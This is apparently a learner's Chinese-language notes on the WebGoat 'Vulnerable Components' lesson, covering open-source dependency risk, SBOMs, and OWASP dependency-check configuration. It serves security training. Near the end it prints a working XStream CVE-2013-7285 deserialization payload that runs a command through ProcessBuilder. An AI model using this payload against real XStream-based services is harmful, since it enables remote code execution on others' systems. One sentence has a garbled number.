webgoat-Vulnerable Components 脆弱的组件

01易受攻击的组件

我们开发软件的方式改变了，开源社区越来越成功，开源软件的可用性越来越丰富，使得我们不需要考虑这些组件的来源。
本节我们要面对管理依赖库的难题，管理这些依赖组件的不是最有风险的，最有风险的是判断我们是否在风险之中。

目标

• 意识到使用的开源代码与您自己的自定义代码一样重要。
• 了解我们的开源组件使用中的管理或缺乏管理。
• 了解物料清单在确定开源组件风险方面的重要性。

02 开源生态系统

10+ 百万 GitHub 代码仓库
1 万个 Sourceforge 代码库
2500 个公共二进制存储库
某些存储库具有严格的发布者标准
某些存储库强制执行源代码分发
不能保证已发布的源代码是已发布二进制文件的源代码
某些存储库允许为同一版本重新发布一组不同的位
某些存储库允许您删除已发布的项目
许多不同的包装系统;即使是同一种语言
不同的坐标系和粒度级别
早在2013年，OWASP就意识到，“我们”需要关注开源组件中的漏洞这个问题。

03

04组件无处不在

WebGoat 使用近 200 个 Java 和 JavaScript 库。像大多数 Java 应用程序一样，我们使用 maven 来管理我们的 java 依赖项，并且我们采用狂野的西部策略来管理 JavaScript。

WebGoat 中易受攻击的组件？
创建本课程时，WebGoat 在其组件中包含十几个高安全风险。其中大多数都不是经过深思熟虑的选择。开发人员应该如何在数百个组件中跟踪这些信息？

05 漏洞并不总是在“您的”代码中

下面是使用相同 WebGoat 源代码但不同版本的 jquery-ui 组件的示例
两个组件，一个点击go显示alert，一个不显示，说明第二个防御了XSS。

06 Knowing the OSS “Bill of Materials” is the starting point

了解OSS“物料清单”是起点
现代应用程序由自定义代码和许多开源部分组成。开发人员通常非常了解他们的自定义代码，但不太熟悉他们使用的库/组件的潜在风险。将物料清单视为配方中的成分列表。

我们应该知道答案的问题：
我们如何知道我们的应用程序中有哪些开源组件？
我们如何知道我们正在使用什么版本的开源组件？
我们如何定义开源组件的风险？
我们如何发现开源组件的风险？
我们如何将特定风险与开源组件的特定版本相关联？
我们如何知道组件何时发布新版本？
我们如何知道是否在以前的“良好”组件上发现了新的漏洞？

如何生成物料清单

有几种开源和付费解决方案可以识别组件中的风险。但是，没有多少工具可以提供应用程序中使用的“成分”的完整列表。OWASP 依赖关系检查提供了生成物料清单和识别潜在安全风险的能力。

依赖项检查使用多个证据来确定库名称。例如，您可以将 OWASP 依赖项检查作为插件添加到 Maven 项目的 pom.xml 中。该插件将从公共漏洞数据库下载信息，并检查是否使用了易受攻击的库，并指示报告了哪个漏洞。

作为开发管道的一部分，如果存在开发团队不知道的违规行为，您可以指示插件使构建失败。此外，您可以使用 xml 文件来放弃某些违规行为。如果无法在应用程序中利用上述漏洞，则应这样做。

<plugin>
        <groupId>org.owasp</groupId>
        <artifactId>dependency-check-maven</artifactId>
        <version>5.3.2</version>
        <configuration>
                <failBuildOnCVSS>7</failBuildOnCVSS>
                <skipProvidedScope>true</skipProvidedScope>
                <skipRuntimeScope>true</skipRuntimeScope>
                <suppressionFiles>
                        <suppressionFile>project-suppression.xml</suppressionFile>
                </suppressionFiles>
        </configuration>
        <executions>
                <execution>
                        <goals>
                                <goal>check</goal>
                        </goals>
                </execution>
        </executions>
</plugin>

And also an example of the suppressed violations.

<?xml version="1.0" encoding="UTF-8"?>
<suppressions xmlns="https://jeremylong.github.io/DependencyCheck/dependency-suppression.1.3.xsd">
    <suppress base="true">
        <cpe>cpe:/a:pivotal_software:spring_security</cpe>
        <cve>CVE-2018-1258</cve>
    </suppress>
    <suppress base="true"><!-- webgoat-server -->
        <cpe>cpe:/a:postgresql:postgresql</cpe>
        <cve>CVE-2018-10936</cve>
    </suppress>
</suppressions>

在IDEA版本执行 mvn clean install -Powasp

08 安全信息过载

什么是重要的？

我的组件是否可被利用？
我的组件是真实的副本吗？
我是否了解为什么我的组件被修改了？

安全信息散落在各处

多个安全公告来源
80,000+ CVE 在国家漏洞数据库中
节点安全项目、Metasploit、VulnDB、Snyk…
数以千计的网站安全公告、博客、推文…
每天生成 600,000 个 GitHub 事件
700 个 GitHub 安全相关事件
发行说明、更改日志、代码注释…

总结

期望开发人员不断研究每个组件是不合理的。
开发人员不是安全专家;他们已经有了一份日常工作。

许可证信息过载

什么是重要的？

我可以在软件分发的上下文中使用此组件吗？
是否存在许可证不兼容问题？
如果使用修改后的组件，我是否履行了额外的许可义务？

许可证信息散落在各处

项目声明许可证：
在项目元数据文件中。
在项目网站或源代码存储库页面上。
在他们自己的源代码存储库中使用指向许可证文件的链接。
在项目源代码树中的许可证文件中。
在二进制 META-INF 文件夹中。
项目在源代码中包含许可证作为标头。

总结

很难确定许可证的范围。
一个项目通常存在许可证差异。
开发商不是律师。

09 架构信息

什么是重要的？

我的组件是旧的还是稳定的
我的组件不受欢迎吗
我没有升级是故意选择还是缺乏知识

总结

使组件保持最新状态确实很困难
对于在 25,000 个应用程序中分析的组件，发现：
8% 的 2 年旧组件没有更新的版本
23% 的 11 年旧组件没有更新的版本
较旧的组件构成了大部分风险

11OSS风险的一些例子

共享资源收藏

2015 年 8 月，Apache Commons Collections 组件的最新版本已经发布了 <> 年。Commons Collections被认为是一个可靠和稳定的组件。一位研究人员发现了一种方法来利用共享资源集合中的反序列化问题，从而导致远程代码执行。第二天…每个使用Commons Collections的人都陷入了恐慌。

参考：数以千计的 Java 应用程序容易受到 9 个月前的远程代码执行漏洞的攻击
http://www.pcworld.com/article/3004633/business-security/thousands-of-java-applications-vulnerable-to-nine-month-old-remote-code-execution-exploit.html

Dinis Cruz 和 Alvaro Munoz 对 XStream 的利用

XStream 是一个相对常见的 XML 和 JSON 解析库，它有一个令人讨厌的远程代码执行。
参考：Dinis Cruz 博客
pwntester/XStreamPOC

在尝试本课程之前，您可能需要阅读这些文章。让我们看看你是否能弄清楚如何在 WebGoat 中利用这一点。

XStream

https://x-stream.github.io/CVE-2013-7285.html
CVE-2013-7285: XStream可以用来进行远程代码执行

0x12

利用CVE-2013-7285 (XStream)
本课程仅在您使用 WebGoat 的 Docker 映像时有效。
WebGoat 使用 XML 文档将联系人添加到联系人数据库。

<contact>
    <id>1</id>
    <firstName>Bruce</firstName>
    <lastName>Mayhew</lastName>
    <email>webgoat@owasp.org</email>
</contact>

本练习所需的 java 接口是：org.owasp.webgoat.vulnerable_components.Contact。首先发送上述联系人，看看正常的响应是什么，然后阅读 CVE 漏洞文档（搜索互联网）并尝试触发该漏洞。对于本示例，我们将让您直接输入 XML，而不是拦截请求并修改数据。您提供联系人的 XML 表示形式，WebGoat 将使用 将其转换为 Contact 对象XStream.fromXML(xml)

直接输入，提示没有远程代码执行
输入POC，应该过的，但是我这还是报错，没找到原因。

<contact class='dynamic-proxy'>
  <interface>org.owasp.webgoat.vulnerable_components.Contact</interface>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>

13 总结

现代应用程序中的开源消费有所增加。
开源是从许多具有不同质量标准的不同存储库中获得的。
有关漏洞的安全信息散落在各处。
许可证信息通常难以验证。
大多数团队没有组件升级策略。
开源组件是新的攻击媒介。

应采取的措施

生成 OSS 物料清单。
使用自动化工具 http://lmgtfy.com/?q=OSS+bill+of+materials
组织中的开源使用基线。
制定开源组件风险管理策略，以减轻当前风险并降低未来风险（华为对开源组件都会进行统一管理）